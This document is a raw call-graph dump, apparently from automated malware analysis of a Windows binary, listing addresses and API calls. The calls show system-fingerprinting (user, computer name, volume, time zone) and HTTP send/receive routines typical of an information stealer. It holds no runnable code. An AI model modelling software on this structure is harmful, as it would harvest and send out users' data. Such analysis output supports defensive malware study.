69522->69595 70631 402286 lstrcpy 69523->70631 69525 40f9e1 lstrcpy 69524->69525 69527 414325 69525->69527 69526 402147 lstrcpy 69526->69595 70626 40217b lstrcpy 69527->70626 69531 41432e 69533 40f9e1 lstrcpy 69531->69533 69532 414396 69534 40f9e1 lstrcpy 69532->69534 69537 41433c 69533->69537 69538 4143a4 69534->69538 69535 413eb7 StrCmpCA 69536 4142d1 69535->69536 69535->69595 69540 40f9e1 lstrcpy 69536->69540 70627 4022a0 lstrcpy 69537->70627 70632 4132d9 lstrcpy _EH_prolog 69538->70632 69539 40217b lstrcpy 69539->69595 69541 4142e0 69540->69541 70624 4021c9 lstrcpy 69541->70624 69546 4142e9 69548 40f9e1 lstrcpy 69546->69548 69547 414064 StrCmpCA 69549 41428f 69547->69549 69547->69595 69554 4142f7 69548->69554 69551 40f9e1 lstrcpy 69549->69551 69550 40f9e1 lstrcpy 69552 41426f 69550->69552 69553 41429e 69551->69553 70621 4132d9 lstrcpy _EH_prolog 69552->70621 70622 402217 lstrcpy 69553->70622 70625 4022ba lstrcpy 69554->70625 69555 413c89 StrCmpCA 69555->69595 69558 402195 lstrcpy 69558->69595 69560 4142a7 69563 40f9e1 lstrcpy 69560->69563 69561 414261 69561->69550 69565 4142b5 69563->69565 69564 41420b StrCmpCA 69566 414226 69564->69566 69567 414216 Sleep 69564->69567 70623 4022d4 lstrcpy 69565->70623 69569 40f9e1 lstrcpy 69566->69569 69567->69595 69568 402231 lstrcpy 69568->69595 69572 414235 69569->69572 69570 413118 33 API calls 69570->69595 69571 41428a 69581 413295 _EH_prolog 69571->69581 70619 402265 lstrcpy 69572->70619 69573 413e36 StrCmpCA 69573->69595 69577 4021e3 lstrcpy 69577->69595 69578 41423e 69580 40f9e1 lstrcpy 69578->69580 69579 4021c9 lstrcpy 69579->69595 69582 41424c 69580->69582 69584 41441b 69581->69584 70620 4022ee lstrcpy 69582->70620 69583 40f95a lstrcpy 69583->69595 70613 401061 _EH_prolog 69584->70613 69586 414427 69596 4136b3 69586->69596 69587 413fe3 StrCmpCA 69587->69595 69589 402217 lstrcpy 69589->69595 69590 41303a 28 API calls 69590->69595 69591 414190 StrCmpCA 69591->69595 69592 4010b1 _EH_prolog lstrcpy 69592->69595 69593 40f9e1 lstrcpy 69593->69595 69594 402265 lstrcpy 69594->69595 69595->69511 69595->69513 69595->69514 69595->69515 69595->69522 69595->69526 69595->69535 69595->69539 69595->69547 69595->69555 69595->69558 69595->69564 69595->69568 69595->69570 69595->69573 69595->69577 69595->69579 69595->69583 69595->69587 69595->69589 69595->69590 69595->69591 69595->69592 69595->69593 69595->69594 70610 402113 69595->70610 70615 402161 lstrcpy 69595->70615 70616 4021af lstrcpy 69595->70616 70617 4021fd lstrcpy 69595->70617 70618 40224b lstrcpy 69595->70618 69597 40f9e1 lstrcpy 69596->69597 69598 4136c3 69597->69598 69599 40f9e1 lstrcpy 69598->69599 69600 4136cf 69599->69600 69601 40f9e1 lstrcpy 69600->69601 69602 4136db 69601->69602 69603 413295 _EH_prolog 69602->69603 69604 4132b5 69603->69604 69604->68704 69606 40f971 69605->69606 69607 40f986 69606->69607 69608 40f97e lstrcpy 69606->69608 69607->68711 69608->69607 69609->68721 69611 410516 GetVolumeInformationA 69610->69611 69612 41050f 69610->69612 69613 410546 69611->69613 69612->69611 69614 410578 GetProcessHeap HeapAlloc 69613->69614 69615 41059b wsprintfA lstrcat 69614->69615 69616 41058d 69614->69616 70633 4104a2 GetCurrentHwProfileA 69615->70633 69617 40f923 lstrcpy 69616->69617 69619 410596 69617->69619 69619->68728 69620 4105cb 69621 4105da lstrlenA 69620->69621 69622 4105ee 69621->69622 70637 411154 lstrcpy malloc strncpy 69622->70637 69624 4105f8 69625 410606 lstrcat 69624->69625 69626 410619 69625->69626 69627 40f923 lstrcpy 69626->69627 69628 41062a 69627->69628 69628->69619 69630 40f95a lstrcpy 69629->69630 69631 403b25 69630->69631 70638 403a54 _EH_prolog 69631->70638 69633 403b31 69634 40f923 lstrcpy 69633->69634 69635 403b4e 69634->69635 69636 40f923 lstrcpy 69635->69636 69637 403b61 69636->69637 69638 40f923 lstrcpy 69637->69638 69639 403b72 69638->69639 69640 40f923 lstrcpy 69639->69640 69641 403b83 69640->69641 69642 40f923 lstrcpy 69641->69642 69643 403b94 69642->69643 69644 403ba4 InternetOpenA StrCmpCA 69643->69644 69645 403bc6 69644->69645 69646 404122 InternetCloseHandle 69645->69646 69647 410b5c 3 API calls 69645->69647 69660 404136 69646->69660 69648 403bdc 69647->69648 69649 40fa28 3 API calls 69648->69649 69650 403bef 69649->69650 69651 40f9e1 lstrcpy 69650->69651 69652 403bfc 69651->69652 69653 40fa9c 4 API calls 69652->69653 69654 403c25 69653->69654 69655 40f9e1 lstrcpy 69654->69655 69656 403c32 69655->69656 69657 40fa9c 4 API calls 69656->69657 69658 403c4f 69657->69658 69659 40f9e1 lstrcpy 69658->69659 69661 403c5c 69659->69661 69660->68731 69662 40fa28 3 API calls 69661->69662 69663 403c78 69662->69663 69664 40f9e1 lstrcpy 69663->69664 69665 403c85 69664->69665 69666 40fa9c 4 API calls 69665->69666 69667 403ca2 69666->69667 69668 40f9e1 lstrcpy 69667->69668 69669 403caf 69668->69669 69670 40fa9c 4 API calls 69669->69670 69671 403ccc 69670->69671 69672 40f9e1 lstrcpy 69671->69672 69673 403cd9 69672->69673 69674 40fa9c 4 API calls 69673->69674 69675 403cf7 69674->69675 69676 40fa28 3 API calls 69675->69676 69677 403d0a 69676->69677 69678 40f9e1 lstrcpy 69677->69678 69679 403d17 69678->69679 69680 403d2f InternetConnectA 69679->69680 69680->69646 69681 403d55 HttpOpenRequestA 69680->69681 69682 404119 InternetCloseHandle 69681->69682 69683 403d8e 69681->69683 69682->69646 69684 403d92 InternetSetOptionA 69683->69684 69685 403da8 69683->69685 69684->69685 69686 40fa9c 4 API calls 69685->69686 69687 403db9 69686->69687 69688 40f9e1 lstrcpy 69687->69688 69689 403dc6 69688->69689 69690 40fa28 3 API calls 69689->69690 69691 403de2 69690->69691 69692 40f9e1 lstrcpy 69691->69692 69693 403def 69692->69693 69694 40fa9c 4 API calls 69693->69694 69695 403e0c 69694->69695 69696 40f9e1 lstrcpy 69695->69696 69697 403e19 69696->69697 69698 40fa9c 4 API calls 69697->69698 69699 403e37 69698->69699 69700 40f9e1 lstrcpy 69699->69700 69701 403e44 69700->69701 69702 40fa9c 4 API calls 69701->69702 69703 403e61 69702->69703 69704 40f9e1 lstrcpy 69703->69704 69705 403e6e 69704->69705 69706 40fa9c 4 API calls 69705->69706 69707 403e8b 69706->69707 69708 40f9e1 lstrcpy 69707->69708 69709 403e98 69708->69709 69710 40fa28 3 API calls 69709->69710 69711 403eb4 69710->69711 69712 40f9e1 lstrcpy 69711->69712 69713 403ec1 69712->69713 69714 40fa9c 4 API calls 69713->69714 69715 403ede 69714->69715 69716 40f9e1 lstrcpy 69715->69716 69717 403eeb 69716->69717 69718 40fa9c 4 API calls 69717->69718 69719 403f08 69718->69719 69720 40f9e1 lstrcpy 69719->69720 69721 403f15 69720->69721 69722 40fa28 3 API calls 69721->69722 69723 403f31 69722->69723 69724 40f9e1 lstrcpy 69723->69724 69725 403f3e 69724->69725 69726 40fa9c 4 API calls 69725->69726 69727 403f5b 69726->69727 69728 40f9e1 lstrcpy 69727->69728 69729 403f68 69728->69729 69730 40fa9c 4 API calls 69729->69730 69731 403f86 69730->69731 69732 40f9e1 lstrcpy 69731->69732 69733 403f93 69732->69733 69734 40fa9c 4 API calls 69733->69734 69735 403fb0 69734->69735 69736 40f9e1 lstrcpy 69735->69736 69737 403fbd 69736->69737 69738 40fa9c 4 API calls 69737->69738 69739 403fda 69738->69739 69740 40f9e1 lstrcpy 69739->69740 69741 403fe7 69740->69741 69742 40fa28 3 API calls 69741->69742 69743 404003 69742->69743 69744 40f9e1 lstrcpy 69743->69744 69745 404010 69744->69745 69746 40f923 lstrcpy 69745->69746 69747 404029 69746->69747 69748 40fa28 3 API calls 69747->69748 69749 40403d 69748->69749 69750 40fa28 3 API calls 69749->69750 69751 404050 69750->69751 69752 40f9e1 lstrcpy 69751->69752 69753 40405d 69752->69753 69754 40407d lstrlenA 69753->69754 69755 40408d 69754->69755 69756 404096 lstrlenA 69755->69756 70646 40fb4d 69756->70646 69758 4040a6 HttpSendRequestA 69759 4040ef InternetReadFile 69758->69759 69760 404106 InternetCloseHandle 69759->69760 69763 4040b5 69759->69763 70647 40f98e 69760->70647 69762 40fa9c 4 API calls 69762->69763 69763->69759 69763->69760 69763->69762 69764 40f9e1 lstrcpy 69763->69764 69764->69763 70651 40fb4d 69765->70651 69767 411cfe StrCmpCA 69768 411d10 69767->69768 69769 411d09 ExitProcess 69767->69769 69770 411d20 strtok_s 69768->69770 69771 411d31 69770->69771 69773 411e6d 69770->69773 69772 411e52 strtok_s 69771->69772 69774 411d81 StrCmpCA 69771->69774 69775 411df1 StrCmpCA 69771->69775 69776 411d65 StrCmpCA 69771->69776 69777 411dc7 StrCmpCA 69771->69777 69778 411e06 StrCmpCA 69771->69778 69779 411d49 StrCmpCA 69771->69779 69780 411d9d StrCmpCA 69771->69780 69781 411ddc StrCmpCA 69771->69781 69782 411e1c StrCmpCA 69771->69782 69783 411e3e StrCmpCA 69771->69783 69784 40f997 2 API calls 69771->69784 69772->69771 69772->69773 69773->68733 69774->69771 69774->69772 69775->69771 69775->69772 69776->69771 69776->69772 69777->69771 69777->69772 69778->69772 69779->69771 69779->69772 69780->69771 69780->69772 69781->69771 69781->69772 69782->69772 69783->69772 69784->69771 69786 40f95a lstrcpy 69785->69786 69787 40517c 69786->69787 69788 403a54 6 API calls 69787->69788 69789 405188 69788->69789 69790 40f923 lstrcpy 69789->69790 69791 4051a5 69790->69791 69792 40f923 lstrcpy 69791->69792 69793 4051b8 69792->69793 69794 40f923 lstrcpy 69793->69794 69795 4051c9 69794->69795 69796 40f923 lstrcpy 69795->69796 69797 4051da 69796->69797 69798 40f923 lstrcpy 69797->69798 69799 4051eb 69798->69799 69800 4051fb InternetOpenA StrCmpCA 69799->69800 69801 40521d 69800->69801 69802 4058d8 InternetCloseHandle 69801->69802 69803 410b5c 3 API calls 69801->69803 69804 4058f3 69802->69804 69805 405233 69803->69805 70658 406242 CryptStringToBinaryA 69804->70658 69807 40fa28 3 API calls 69805->69807 69809 405246 69807->69809 69810 40f9e1 lstrcpy 69809->69810 69815 405253 69810->69815 69811 40f997 2 API calls 69812 40590c 69811->69812 69813 40fa9c 4 API calls 69812->69813 69814 40591a 69813->69814 69816 40f9e1 lstrcpy 69814->69816 69817 40fa9c 4 API calls 69815->69817 69822 405926 69816->69822 69818 40527c 69817->69818 69819 40f9e1 lstrcpy 69818->69819 69820 405289 69819->69820 69821 40fa9c 4 API calls 69820->69821 69823 4052a6 69821->69823 69824 401061 _EH_prolog 69822->69824 69825 40f9e1 lstrcpy 69823->69825 69826 405984 69824->69826 69827 4052b3 69825->69827 69826->68739 69828 40fa28 3 API calls 69827->69828 69829 4052cf 69828->69829 69830 40f9e1 lstrcpy 69829->69830 69831 4052dc 69830->69831 69832 40fa9c 4 API calls 69831->69832 69833 4052f9 69832->69833 69834 40f9e1 lstrcpy 69833->69834 69835 405306 69834->69835 69836 40fa9c 4 API calls 69835->69836 69837 405323 69836->69837 69838 40f9e1 lstrcpy 69837->69838 69839 405330 69838->69839 69840 40fa9c 4 API calls 69839->69840 69841 40534e 69840->69841 69842 40fa28 3 API calls 69841->69842 69843 405361 69842->69843 69844 40f9e1 lstrcpy 69843->69844 69845 40536e 69844->69845 69846 405386 InternetConnectA 69845->69846 69846->69802 69847 4053ac HttpOpenRequestA 69846->69847 69848 4053e3 69847->69848 69849 4058cf InternetCloseHandle 69847->69849 69850 4053e7 InternetSetOptionA 69848->69850 69851 4053fd 69848->69851 69849->69802 69850->69851 69852 40fa9c 4 API calls 69851->69852 69853 40540e 69852->69853 69854 40f9e1 lstrcpy 69853->69854 69855 40541b 69854->69855 69856 40fa28 3 API calls 69855->69856 69857 405437 69856->69857 69858 40f9e1 lstrcpy 69857->69858 69859 405444 69858->69859 69860 40fa9c 4 API calls 69859->69860 69861 405461 69860->69861 69862 40f9e1 lstrcpy 69861->69862 69863 40546e 69862->69863 69864 40fa9c 4 API calls 69863->69864 69865 40548c 69864->69865 69866 40f9e1 lstrcpy 69865->69866 69867 405499 69866->69867 69868 40fa9c 4 API calls 69867->69868 69869 4054b7 69868->69869 69870 40f9e1 lstrcpy 69869->69870 69871 4054c4 69870->69871 69872 40fa9c 4 API calls 69871->69872 69873 4054e1 69872->69873 69874 40f9e1 lstrcpy 69873->69874 69875 4054ee 69874->69875 69876 40fa28 3 API calls 69875->69876 69877 40550a 69876->69877 69878 40f9e1 lstrcpy 69877->69878 69879 405517 69878->69879 69880 40fa9c 4 API calls 69879->69880 69881 405534 69880->69881 69882 40f9e1 lstrcpy 69881->69882 69883 405541 69882->69883 69884 40fa9c 4 API calls 69883->69884 69885 40555e 69884->69885 69886 40f9e1 lstrcpy 69885->69886 69887 40556b 69886->69887 69888 40fa28 3 API calls 69887->69888 69889 405587 69888->69889 69890 40f9e1 lstrcpy 69889->69890 69891 405594 69890->69891 69892 40fa9c 4 API calls 69891->69892 69893 4055b1 69892->69893 69894 40f9e1 lstrcpy 69893->69894 69895 4055be 69894->69895 69896 40fa9c 4 API calls 69895->69896 69897 4055dc 69896->69897 69898 40f9e1 lstrcpy 69897->69898 69899 4055e9 69898->69899 69900 40fa9c 4 API calls 69899->69900 69901 405606 69900->69901 69902 40f9e1 lstrcpy 69901->69902 69903 405613 69902->69903 69904 40fa9c 4 API calls 69903->69904 69905 405630 69904->69905 69906 40f9e1 lstrcpy 69905->69906 69907 40563d 69906->69907 69908 40fa9c 4 API calls 69907->69908 69909 40565b 69908->69909 69910 40f9e1 lstrcpy 69909->69910 69911 405668 69910->69911 69912 40fa9c 4 API calls 69911->69912 69913 405685 69912->69913 69914 40f9e1 lstrcpy 69913->69914 69915 405692 69914->69915 69916 40fa9c 4 API calls 69915->69916 69917 4056af 69916->69917 69918 40f9e1 lstrcpy 69917->69918 69919 4056bc 69918->69919 69920 40fa28 3 API calls 69919->69920 69921 4056d8 69920->69921 69922 40f9e1 lstrcpy 69921->69922 69923 4056e5 69922->69923 69924 40fa9c 4 API calls 69923->69924 69925 405702 69924->69925 69926 40f9e1 lstrcpy 69925->69926 69927 40570f 69926->69927 69928 40fa9c 4 API calls 69927->69928 69929 40572d 69928->69929 69930 40f9e1 lstrcpy 69929->69930 69931 40573a 69930->69931 69932 40fa9c 4 API calls 69931->69932 69933 405757 69932->69933 69934 40f9e1 lstrcpy 69933->69934 69935 405764 69934->69935 69936 40fa9c 4 API calls 69935->69936 69937 405781 69936->69937 69938 40f9e1 lstrcpy 69937->69938 69939 40578e 69938->69939 69940 40fa28 3 API calls 69939->69940 69941 4057aa 69940->69941 69942 40f9e1 lstrcpy 69941->69942 69943 4057b7 69942->69943 69944 4057cb lstrlenA 69943->69944 70652 40fb4d 69944->70652 69946 4057dc lstrlenA GetProcessHeap HeapAlloc 70653 40fb4d 69946->70653 69948 4057fe lstrlenA 70654 40fb4d 69948->70654 69950 40580e memcpy 70655 40fb4d 69950->70655 69952 405820 lstrlenA 69953 405830 69952->69953 69954 405839 lstrlenA memcpy 69953->69954 70656 40fb4d 69954->70656 69956 405855 lstrlenA 70657 40fb4d 69956->70657 69958 405865 HttpSendRequestA 69959 4058b1 InternetReadFile 69958->69959 69960 4058c8 InternetCloseHandle 69959->69960 69963 405877 69959->69963 69960->69849 69961 40fa9c 4 API calls 69961->69963 69962 40f9e1 lstrcpy 69962->69963 69963->69959 69963->69960 69963->69961 69963->69962 70663 40fb4d 69964->70663 69966 411740 strtok_s 69967 4117a9 69966->69967 69968 41174d 69966->69968 69967->68741 69969 411792 strtok_s 69968->69969 69970 40f997 2 API calls 69968->69970 69971 40f997 2 API calls 69968->69971 69969->69967 69969->69968 69970->69969 69971->69968 70664 40fb4d 69972->70664 69974 41151d strtok_s 69975 41162e 69974->69975 69976 41152e 69974->69976 69975->68749 69977 4115df StrCmpCA 69976->69977 69978 40f997 2 API calls 69976->69978 69979 411611 strtok_s 69976->69979 69980 4115ae StrCmpCA 69976->69980 69981 411589 StrCmpCA 69976->69981 69982 41155b StrCmpCA 69976->69982 69977->69976 69978->69979 69979->69975 69979->69976 69980->69976 69981->69976 69982->69976 70665 40fb4d 69983->70665 69985 411674 strtok_s 69986 4116fa 69985->69986 69987 411681 69985->69987 69986->68757 69988 4116ab StrCmpCA 69987->69988 69989 40f997 2 API calls 69987->69989 69990 4116e3 strtok_s 69987->69990 69991 40f997 2 API calls 69987->69991 69988->69987 69989->69990 69990->69986 69990->69987 69991->69987 69993 40f923 lstrcpy 69992->69993 69994 414625 69993->69994 69995 40fa9c 4 API calls 69994->69995 69996 41463a 69995->69996 69997 40f9e1 lstrcpy 69996->69997 69998 414647 69997->69998 69999 40fa9c 4 API calls 69998->69999 70000 414665 69999->70000 70001 40f9e1 lstrcpy 70000->70001 70002 414672 70001->70002 70003 40fa9c 4 API calls 70002->70003 70004 41468f 70003->70004 70005 40f9e1 lstrcpy 70004->70005 70006 41469c 70005->70006 70007 40fa9c 4 API calls 70006->70007 70008 4146b9 70007->70008 70009 40f9e1 lstrcpy 70008->70009 70010 4146c6 70009->70010 70011 40fa9c 4 API calls 70010->70011 70012 4146e3 70011->70012 70013 40f9e1 lstrcpy 70012->70013 70014 4146f0 70013->70014 70666 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 70014->70666 70016 414701 70017 40fa9c 4 API calls 70016->70017 70018 41470e 70017->70018 70019 40f9e1 lstrcpy 70018->70019 70020 41471b 70019->70020 70021 40fa9c 4 API calls 70020->70021 70022 414738 70021->70022 70023 40f9e1 lstrcpy 70022->70023 70024 414745 70023->70024 70025 40fa9c 4 API calls 70024->70025 70026 414762 70025->70026 70027 40f9e1 lstrcpy 70026->70027 70028 41476f 70027->70028 70667 410415 memset RegOpenKeyExA 70028->70667 70030 414780 70031 40fa9c 4 API calls 70030->70031 70032 41478d 70031->70032 70033 40f9e1 lstrcpy 70032->70033 70034 41479a 70033->70034 70035 40fa9c 4 API calls 70034->70035 70036 4147b7 70035->70036 70037 40f9e1 lstrcpy 70036->70037 70038 4147c4 70037->70038 70039 40fa9c 4 API calls 70038->70039 70040 4147e1 70039->70040 70041 40f9e1 lstrcpy 70040->70041 70042 4147ee 70041->70042 70043 4104a2 2 API calls 70042->70043 70044 414803 70043->70044 70045 40fa28 3 API calls 70044->70045 70046 414815 70045->70046 70047 40f9e1 lstrcpy 70046->70047 70048 414822 70047->70048 70049 40fa9c 4 API calls 70048->70049 70050 41484b 70049->70050 70051 40f9e1 lstrcpy 70050->70051 70052 414858 70051->70052 70053 40fa9c 4 API calls 70052->70053 70054 414875 70053->70054 70055 40f9e1 lstrcpy 70054->70055 70056 414882 70055->70056 70057 4104dd 13 API calls 70056->70057 70058 414897 70057->70058 70059 40fa28 3 API calls 70058->70059 70060 4148a9 70059->70060 70061 40f9e1 lstrcpy 70060->70061 70062 4148b6 70061->70062 70063 40fa9c 4 API calls 70062->70063 70064 4148df 70063->70064 70065 40f9e1 lstrcpy 70064->70065 70066 4148ec 70065->70066 70067 40fa9c 4 API calls 70066->70067 70068 414909 70067->70068 70069 40f9e1 lstrcpy 70068->70069 70070 414916 70069->70070 70071 414922 GetCurrentProcessId 70070->70071 70671 411001 OpenProcess 70071->70671 70074 40fa28 3 API calls 70075 414945 70074->70075 70076 40f9e1 lstrcpy 70075->70076 70077 414952 70076->70077 70078 40fa9c 4 API calls 70077->70078 70079 41497b 70078->70079 70080 40f9e1 lstrcpy 70079->70080 70081 414988 70080->70081 70082 40fa9c 4 API calls 70081->70082 70083 4149a5 70082->70083 70084 40f9e1 lstrcpy 70083->70084 70085 4149b2 70084->70085 70086 40fa9c 4 API calls 70085->70086 70087 4149cf 70086->70087 70088 40f9e1 lstrcpy 70087->70088 70089 4149dc 70088->70089 70090 40fa9c 4 API calls 70089->70090 70091 4149f9 70090->70091 70092 40f9e1 lstrcpy 70091->70092 70093 414a06 70092->70093 70676 41064b GetProcessHeap HeapAlloc 70093->70676 70096 40fa9c 4 API calls 70097 414a24 70096->70097 70098 40f9e1 lstrcpy 70097->70098 70099 414a31 70098->70099 70100 40fa9c 4 API calls 70099->70100 70101 414a4e 70100->70101 70102 40f9e1 lstrcpy 70101->70102 70103 414a5b 70102->70103 70104 40fa9c 4 API calls 70103->70104 70105 414a78 70104->70105 70106 40f9e1 lstrcpy 70105->70106 70107 414a85 70106->70107 70682 41077c _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 70107->70682 70110 40fa28 3 API calls 70111 414aac 70110->70111 70112 40f9e1 lstrcpy 70111->70112 70113 414ab9 70112->70113 70114 40fa9c 4 API calls 70113->70114 70115 414ae2 70114->70115 70116 40f9e1 lstrcpy 70115->70116 70117 414aef 70116->70117 70118 40fa9c 4 API calls 70117->70118 70119 414b0c 70118->70119 70120 40f9e1 lstrcpy 70119->70120 70121 414b19 70120->70121 70695 410925 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 70121->70695 70124 40fa28 3 API calls 70125 414b40 70124->70125 70126 40f9e1 lstrcpy 70125->70126 70127 414b4d 70126->70127 70128 40fa9c 4 API calls 70127->70128 70129 414b76 70128->70129 70130 40f9e1 lstrcpy 70129->70130 70131 414b83 70130->70131 70132 40fa9c 4 API calls 70131->70132 70133 414ba0 70132->70133 70134 40f9e1 lstrcpy 70133->70134 70135 414bad 70134->70135 70708 40fbfd GetProcessHeap HeapAlloc GetComputerNameA 70135->70708 70138 40fa9c 4 API calls 70139 414bcb 70138->70139 70140 40f9e1 lstrcpy 70139->70140 70141 414bd8 70140->70141 70142 40fa9c 4 API calls 70141->70142 70143 414bf5 70142->70143 70144 40f9e1 lstrcpy 70143->70144 70145 414c02 70144->70145 70146 40fa9c 4 API calls 70145->70146 70147 414c1f 70146->70147 70148 40f9e1 lstrcpy 70147->70148 70149 414c2c 70148->70149 70710 40fbcb GetProcessHeap HeapAlloc GetUserNameA 70149->70710 70151 414c3d 70152 40fa9c 4 API calls 70151->70152 70153 414c4a 70152->70153 70154 40f9e1 lstrcpy 70153->70154 70155 414c57 70154->70155 70156 40fa9c 4 API calls 70155->70156 70157 414c74 70156->70157 70158 40f9e1 lstrcpy 70157->70158 70159 414c81 70158->70159 70160 40fa9c 4 API calls 70159->70160 70161 414c9e 70160->70161 70162 40f9e1 lstrcpy 70161->70162 70163 414cab 70162->70163 70711 4103a0 7 API calls 70163->70711 70166 40fa28 3 API calls 70167 414cd2 70166->70167 70168 40f9e1 lstrcpy 70167->70168 70169 414cdf 70168->70169 70170 40fa9c 4 API calls 70169->70170 70171 414d08 70170->70171 70172 40f9e1 lstrcpy 70171->70172 70173 414d15 70172->70173 70174 40fa9c 4 API calls 70173->70174 70175 414d32 70174->70175 70176 40f9e1 lstrcpy 70175->70176 70177 414d3f 70176->70177 70714 40fce5 _EH_prolog 70177->70714 70180 40fa28 3 API calls 70181 414d69 70180->70181 70182 40f9e1 lstrcpy 70181->70182 70183 414d76 70182->70183 70184 40fa9c 4 API calls 70183->70184 70185 414da5 70184->70185 70186 40f9e1 lstrcpy 70185->70186 70187 414db2 70186->70187 70188 40fa9c 4 API calls 70187->70188 70189 414dd5 70188->70189 70190 40f9e1 lstrcpy 70189->70190 70191 414de2 70190->70191 70724 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 70191->70724 70193 414df6 70194 40fa9c 4 API calls 70193->70194 70195 414e06 70194->70195 70196 40f9e1 lstrcpy 70195->70196 70197 414e13 70196->70197 70198 40fa9c 4 API calls 70197->70198 70199 414e36 70198->70199 70200 40f9e1 lstrcpy 70199->70200 70201 414e43 70200->70201 70202 40fa9c 4 API calls 70201->70202 70203 414e63 70202->70203 70204 40f9e1 lstrcpy 70203->70204 70205 414e70 70204->70205 70725 40fc92 GetProcessHeap HeapAlloc GetTimeZoneInformation 70205->70725 70208 40fa9c 4 API calls 70209 414e8e 70208->70209 70210 40f9e1 lstrcpy 70209->70210 70211 414e9b 70210->70211 70212 40fa9c 4 API calls 70211->70212 70213 414ebb 70212->70213 70214 40f9e1 lstrcpy 70213->70214 70215 414ec8 70214->70215 70216 40fa9c 4 API calls 70215->70216 70217 414eeb 70216->70217 70218 40f9e1 lstrcpy 70217->70218 70219 414ef8 70218->70219 70220 40fa9c 4 API calls 70219->70220 70221 414f1b 70220->70221 70222 40f9e1 lstrcpy 70221->70222 70223 414f28 70222->70223 70728 40fe18 GetProcessHeap HeapAlloc RegOpenKeyExA 70223->70728 70226 40fa9c 4 API calls 70227 414f4c 70226->70227 70228 40f9e1 lstrcpy 70227->70228 70229 414f59 70228->70229 70230 40fa9c 4 API calls 70229->70230 70231 414f7c 70230->70231 70232 40f9e1 lstrcpy 70231->70232 70233 414f89 70232->70233 70234 40fa9c 4 API calls 70233->70234 70235 414fa9 70234->70235 70236 40f9e1 lstrcpy 70235->70236 70237 414fb6 70236->70237 70731 40feb4 70237->70731 70240 40fa9c 4 API calls 70241 414fd4 70240->70241 70242 40f9e1 lstrcpy 70241->70242 70243 414fe1 70242->70243 70244 40fa9c 4 API calls 70243->70244 70245 415001 70244->70245 70246 40f9e1 lstrcpy 70245->70246 70247 41500e 70246->70247 70248 40fa9c 4 API calls 70247->70248 70249 41502e 70248->70249 70250 40f9e1 lstrcpy 70249->70250 70251 41503b 70250->70251 70746 40fe81 GetSystemInfo wsprintfA 70251->70746 70253 41504c 70254 40fa9c 4 API calls 70253->70254 70255 415059 70254->70255 70256 40f9e1 lstrcpy 70255->70256 70257 415066 70256->70257 70258 40fa9c 4 API calls 70257->70258 70259 415086 70258->70259 70260 40f9e1 lstrcpy 70259->70260 70261 415093 70260->70261 70262 40fa9c 4 API calls 70261->70262 70263 4150b3 70262->70263 70264 40f9e1 lstrcpy 70263->70264 70265 4150c0 70264->70265 70747 40ff81 GetProcessHeap HeapAlloc 70265->70747 70267 4150d1 70268 40fa9c 4 API calls 70267->70268 70269 4150de 70268->70269 70270 40f9e1 lstrcpy 70269->70270 70271 4150eb 70270->70271 70272 40fa9c 4 API calls 70271->70272 70273 41510b 70272->70273 70274 40f9e1 lstrcpy 70273->70274 70275 415118 70274->70275 70276 40fa9c 4 API calls 70275->70276 70277 41513b 70276->70277 70278 40f9e1 lstrcpy 70277->70278 70279 415148 70278->70279 70752 40ffea _EH_prolog 70279->70752 70282 40fa28 3 API calls 70283 415178 70282->70283 70284 40f9e1 lstrcpy 70283->70284 70285 415185 70284->70285 70286 40fa9c 4 API calls 70285->70286 70287 4151b7 70286->70287 70288 40f9e1 lstrcpy 70287->70288 70289 4151c4 70288->70289 70290 40fa9c 4 API calls 70289->70290 70291 4151e7 70290->70291 70292 40f9e1 lstrcpy 70291->70292 70293 4151f4 70292->70293 70758 4102c3 _EH_prolog 70293->70758 70295 41520f 70296 40fa28 3 API calls 70295->70296 70297 415224 70296->70297 70298 40f9e1 lstrcpy 70297->70298 70299 415231 70298->70299 70300 40fa9c 4 API calls 70299->70300 70301 415263 70300->70301 70302 40f9e1 lstrcpy 70301->70302 70303 415270 70302->70303 70304 40fa9c 4 API calls 70303->70304 70305 415293 70304->70305 70306 40f9e1 lstrcpy 70305->70306 70307 4152a0 70306->70307 70766 410071 _EH_prolog 70307->70766 70309 4152bd 70310 40fa28 3 API calls 70309->70310 70311 4152d3 70310->70311 70312 40f9e1 lstrcpy 70311->70312 70313 4152e0 70312->70313 70314 410071 15 API calls 70313->70314 70315 41530c 70314->70315 70316 40fa28 3 API calls 70315->70316 70317 41531f 70316->70317 70318 40f9e1 lstrcpy 70317->70318 70319 41532c 70318->70319 70320 40fa9c 4 API calls 70319->70320 70321 415358 70320->70321 70322 40f9e1 lstrcpy 70321->70322 70323 415365 70322->70323 70324 415379 lstrlenA 70323->70324 70325 415389 70324->70325 70326 40f923 lstrcpy 70325->70326 70327 41539f 70326->70327 70328 4010b1 2 API calls 70327->70328 70329 4153b7 70328->70329 70782 414437 _EH_prolog 70329->70782 70331 4153c4 70332 401061 _EH_prolog 70331->70332 70333 4153ea 70332->70333 70333->68762 70335 40f95a lstrcpy 70334->70335 70336 4041dd 70335->70336 70337 403a54 6 API calls 70336->70337 70338 4041e9 GetProcessHeap RtlAllocateHeap 70337->70338 71052 40fb4d 70338->71052 70340 404223 InternetOpenA StrCmpCA 70341 404242 70340->70341 70342 404378 InternetCloseHandle 70341->70342 70343 40424d InternetConnectA 70341->70343 70346 4042e9 70342->70346 70344 40426d HttpOpenRequestA 70343->70344 70345 40436f InternetCloseHandle 70343->70345 70347 4042a2 70344->70347 70348 404368 InternetCloseHandle 70344->70348 70345->70342 70346->68767 70349 4042a6 InternetSetOptionA 70347->70349 70350 4042bc HttpSendRequestA HttpQueryInfoA 70347->70350 70348->70345 70349->70350 70350->70346 70352 40430c 70350->70352 70351 404326 InternetReadFile 70351->70348 70351->70352 70352->70346 70352->70348 70352->70351 71053 4060db 70353->71053 70355 40ef5b 70359 40ed50 StrCmpCA 70388 40ed28 70359->70388 70362 40edc4 StrCmpCA 70362->70388 70365 40f923 lstrcpy 70365->70388 70366 40eee0 StrCmpCA 70366->70388 70369 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 70369->70388 70372 4010b1 _EH_prolog lstrcpy 70372->70388 70373 40fa28 3 API calls 70373->70388 70376 40f9e1 lstrcpy 70376->70388 70387 40f95a lstrcpy 70387->70388 70388->70355 70388->70359 70388->70362 70388->70365 70388->70366 70388->70369 70388->70372 70388->70373 70388->70376 70388->70387 71056 40d3fa _EH_prolog 